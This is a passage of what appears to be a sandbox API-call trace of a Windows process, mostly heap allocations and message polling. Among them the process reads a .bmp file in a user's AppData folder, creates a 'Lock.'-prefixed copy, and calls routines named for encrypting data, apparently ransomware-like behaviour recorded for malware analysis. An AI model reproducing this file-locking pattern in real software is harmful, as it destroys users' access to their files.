(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0228.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0228.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EdsWI8rB4BywDqnX6.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\edswi8rb4bywdqnx6.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0228.919] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.919] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0228.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0228.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0228.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.920] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0228.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0228.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0228.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.EdsWI8rB4BywDqnX6.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.edswi8rb4bywdqnx6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0228.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0228.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0228.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0228.923] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0228.924] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x7028, lpOverlapped=0x0) returned 1 [0228.976] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0228.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x3bf0dd8 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x2f14818 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x3bf0dd8 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0228.979] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.979] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0228.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0228.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x3bf0dd8 [0228.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55018 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0228.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x2f1b848 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0228.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0228.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0228.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.982] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.982] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.982] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0228.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0228.982] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0228.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.983] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.983] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 